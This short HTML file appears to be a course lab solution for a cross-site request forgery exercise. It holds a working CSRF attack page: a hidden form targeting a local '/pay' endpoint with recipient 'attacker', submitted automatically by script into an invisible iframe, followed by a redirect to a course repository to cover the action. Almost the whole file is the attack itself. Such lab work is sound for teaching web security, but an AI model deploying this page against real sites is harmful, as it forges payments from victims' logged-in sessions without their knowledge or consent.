<!DOCTYPE html>
<html>

<!-- Insert CSRF attack code here -->
<iframe name="payment-response" style="visibility: hidden;">
</iframe>

<div class="payment-form" style="visibility: hidden;">
  <h3 class="payment-header">Make payment?</h3>
  <form action="http://localhost:8080/pay" method="post" target="payment-response">
    <div class="form-group">
      <div class="form-label">To:</div>
      <div class="form-input"><input name="recipient" type="text" value="attacker" defaultvalue="attacker"></div>
    </div>
    <div class="form-group">
      <div class="form-label">Amount:</div>
      <div class="form-input"><input name="amount" type="number" value="10" defaultvalue="10"></div>
    </div>
    <input class="form-button" type="submit" value="Pay">
  </form>  
</div>

<script>
  // submit form automatically
  document.forms[0].submit();
  // redirec to another page
  window.location.href = "https://github.com/tomrist/cs5435-spring2024";
</script>

</html>
